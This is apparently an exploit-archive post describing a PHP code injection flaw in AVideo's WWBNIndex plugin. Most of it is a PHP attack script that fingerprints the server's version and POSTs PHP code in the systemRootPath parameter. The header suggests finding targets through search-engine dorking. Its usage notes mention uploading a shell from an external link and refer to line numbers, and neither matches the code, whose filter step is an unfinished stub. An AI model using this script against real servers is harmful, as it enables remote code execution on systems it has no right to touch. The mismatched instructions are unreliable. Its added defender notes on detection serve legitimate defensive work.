Headline
AVideo 12.4 Code Injection
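AVideo version 12.4 suffers from a PHP code injection vulnerability in the WWBNIndex plugin. The proof of concept below sends its content in the `systemRootPath` POST parameter of `/plugin/WWBNIndex/submitIndex.php`, and its version check treats releases 12.4 through 14.2 with that plugin reachable as affected.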
=============================================================================================================================================
| # Title : AVideo 12.4 php code injection Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits) |
| # Vendor : https://github.com/WWBN/AVideo/tree/master |
=============================================================================================================================================
POC :
[+] Dorking İn Google Or Other Search Enggine.
[+] The following php code Upload shell file from external link.
[+] Line 114 set your target.
[+] Line 115 set your commands.
[+] save code as poc.php .
[+] USage : cmd = php poc.php .
[+] PayLoad :
<?php
/**
 * Proof-of-concept client for the AVideo WWBNIndex plugin issue described above.
 *
 * check() reads the AVideo version from the public index page and probes the
 * plugin endpoint; exploit() sends one POST to that endpoint.
 *
 * Defender notes:
 * - The only request that carries the payload is a POST to
 *   /plugin/WWBNIndex/submitIndex.php with a form field named systemRootPath.
 *   Requests to that path, and in particular that parameter name, are the
 *   indicator to alert on. Standard access logs do not record POST bodies, so
 *   matching the parameter needs request-body logging or a WAF rule.
 * - check() treats 12.4 through 14.2 as affected. Confirm the fixed release
 *   against the vendor's advisory; until patched, removing the WWBNIndex
 *   plugin or denying external access to submitIndex.php removes the exposed
 *   endpoint.
 */
class indoushka
{
    // Base URL of the AVideo instance; request paths are appended to it verbatim.
    private $target_uri;
    // Text that exploit() wraps and submits.
    private $payload;

    /**
     * Stores the base URL and the payload text; no validation is performed.
     *
     * @param mixed $target_uri Base URL, concatenated with each request path.
     * @param mixed $payload    Text placed into the submitted parameter.
     */
    public function __construct($target_uri, $payload)
    {
        $this->target_uri = $target_uri;
        $this->payload = $payload;
    }

    /**
     * Builds the request body and POSTs it to the WWBNIndex submitIndex.php endpoint.
     *
     * Returns nothing. Prints a message when the HTTP status is anything other
     * than 200.
     */
    public function exploit()
    {
        // Prepare the payload.
        // isArchPHP() returns true unconditionally in this file, so the
        // system(base64_decode(...)) alternative below is never selected.
        $php_code = "<?php " . ($this->isArchPHP() ? $this->payload : "system(base64_decode('" . base64_encode($this->payload) . "'));") . " ?>";
        // generatePhpFilterPayload() is a stub here and returns its input unchanged.
        $filter_payload = $this->generatePhpFilterPayload($php_code);
        // Send the request.
        // Single form field "systemRootPath": this is the value a detection
        // rule should inspect on requests to the plugin endpoint.
        $data = http_build_query(['systemRootPath' => $filter_payload]);
        $response = $this->sendRequest('POST', '/plugin/WWBNIndex/submitIndex.php', $data);
        if ($response['code'] !== 200) {
            echo "Server returned " . $response['code'] . ". Successful exploit attempts should not return a response.\n";
        }
    }

    /**
     * Fingerprints the target and returns a human-readable verdict string.
     *
     * Fetches /index.php, extracts a version number from the page body, probes
     * the plugin endpoint with a GET, and compares the version against the
     * range 12.4 to 14.2 inclusive.
     *
     * NOTE(review): a "non-vulnerable" or "unable to extract" result from this
     * method is not evidence that a host is unaffected; see the comments on
     * the version extraction below.
     *
     * @return string Verdict or error description.
     */
    public function check()
    {
        $response = $this->sendRequest('GET', '/index.php');
        // sendRequest() always returns a non-empty array, so this branch is
        // not taken; a failed connection surfaces as an HTTP code other than
        // 200 in the next check instead.
        if (!$response) {
            return 'Failed to connect to the target.';
        }
        if ($response['code'] !== 200) {
            return "Unexpected HTTP response code: " . $response['code'];
        }
        // Two version sources on the public page: the "Powered by" footer and
        // an HTML comment containing "v:<number>". Both disclose the running
        // version to any unauthenticated visitor.
        // NOTE(review): both calls write to the same $version_match, so the
        // result of the footer pattern is overwritten by the comment pattern,
        // and only the second pattern decides the outcome.
        preg_match('/Powered by AVideo ® Platform v([\d.]+)/', $response['body'], $version_match);
        preg_match('/<!--.*?v:([\d.]+).*?-->/m', $response['body'], $version_match);
        if (empty($version_match[1])) {
            return 'Unable to extract AVideo version.';
        }
        $version = $version_match[1];
        // Plugin presence is inferred solely from a 200 response to a GET on
        // the endpoint.
        $plugin_check = $this->sendRequest('GET', '/plugin/WWBNIndex/submitIndex.php');
        if ($plugin_check['code'] !== 200) {
            return 'Vulnerable plugin WWBNIndex was not detected';
        }
        // Affected range as encoded by the author: 12.4 <= version <= 14.2.
        if (version_compare($version, '12.4') >= 0 && version_compare($version, '14.2') <= 0) {
            return "Detected vulnerable AVideo version: {$version}, with vulnerable plugin WWBNIndex running.";
        }
        return "Detected non-vulnerable AVideo version: {$version}";
    }

    /**
     * Performs one HTTP request with cURL and returns the status code and body.
     *
     * No timeout, redirect, header or TLS options are set beyond those shown,
     * so cURL defaults apply.
     *
     * @param mixed $method HTTP method; 'POST' additionally attaches $data as the body.
     * @param mixed $uri    Path appended to the stored base URL.
     * @param mixed $data   Request body, used only for POST.
     *
     * @return array 'code' holds the HTTP status reported by cURL, 'body' the
     *               return value of curl_exec() (false when the transfer fails).
     */
    private function sendRequest($method, $uri, $data = null)
    {
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, $this->target_uri . $uri);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
        curl_setopt($ch, CURLOPT_CUSTOMREQUEST, $method);
        if ($method === 'POST') {
            curl_setopt($ch, CURLOPT_POST, true);
            curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
        }
        $response = curl_exec($ch);
        $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
        curl_close($ch);
        return ['code' => $http_code, 'body' => $response];
    }

    /**
     * Placeholder predicate; always returns true in this file.
     *
     * @return bool
     */
    private function isArchPHP()
    {
        // Assume that the payload is PHP code.
        return true; // or check this based on certain conditions
    }

    /**
     * Placeholder for the payload-preparation (filter) step.
     *
     * No transformation is implemented on this page: the argument is returned
     * unchanged.
     *
     * @param mixed $php_code Text produced by exploit().
     *
     * @return mixed The same value that was passed in.
     */
    private function generatePhpFilterPayload($php_code)
    {
        // The payload preparation (filter) logic is supposed to be added here.
        return $php_code; // modify this according to your requirements
    }
}

// Usage example:
$target_uri = "http://target-url.com"; // enter the target address here
$payload = "<?php echo 'Hello World!'; ?>"; // the payload to use
$indoushka = new indoushka($target_uri, $payload);
// The script runs the fingerprint first, prints its verdict, and then sends
// the POST regardless of what the verdict was.
$check_result = $indoushka->check();
echo $check_result . "\n";
$indoushka->exploit();
?>
Greetings to :
=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)
|===================================================================================================